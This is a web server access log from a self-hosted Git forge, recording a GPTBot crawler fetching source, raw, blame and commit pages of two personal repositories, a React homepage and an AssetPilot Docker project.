git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16505] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" +[17/Feb/2026:13:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" +[17/Feb/2026:13:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" +[17/Feb/2026:13:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:13:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14843] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" +[17/Feb/2026:13:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16504] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" +[17/Feb/2026:13:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:13:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13682] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" +[17/Feb/2026:13:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16506] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" +[17/Feb/2026:13:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13975] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13812] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" +[17/Feb/2026:13:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13957] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" +[17/Feb/2026:13:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14843] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" +[17/Feb/2026:13:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" +[17/Feb/2026:13:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" +[17/Feb/2026:13:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15579] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" +[17/Feb/2026:13:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14234] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" +[17/Feb/2026:13:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" +[17/Feb/2026:13:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14845] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" +[17/Feb/2026:13:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15578] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" +[17/Feb/2026:13:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13959] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" +[17/Feb/2026:13:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13813] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" +[17/Feb/2026:13:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13322] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 74.7.227.38] [Length 20436] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:13:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" +[17/Feb/2026:13:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 74.7.227.38] [Length 21964] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" +[17/Feb/2026:13:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:13:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13814] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 15933] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 74.7.227.38] [Length 60690] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" +[17/Feb/2026:13:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15819] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" +[17/Feb/2026:13:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" +[17/Feb/2026:13:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" +[17/Feb/2026:13:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 74.7.227.38] [Length 22385] [Gzip 12.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" +[17/Feb/2026:13:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" +[17/Feb/2026:13:49:01 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" +[17/Feb/2026:13:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 74.7.227.38] [Length 24013] [Gzip 13.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" +[17/Feb/2026:13:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 74.7.227.38] [Length 14458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" +[17/Feb/2026:13:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 74.7.227.38] [Length 16056] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" +[17/Feb/2026:13:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22138] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 60539] [Gzip 8.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 60534] [Gzip 8.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 60561] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 60715] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 74.7.227.38] [Length 14609] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr 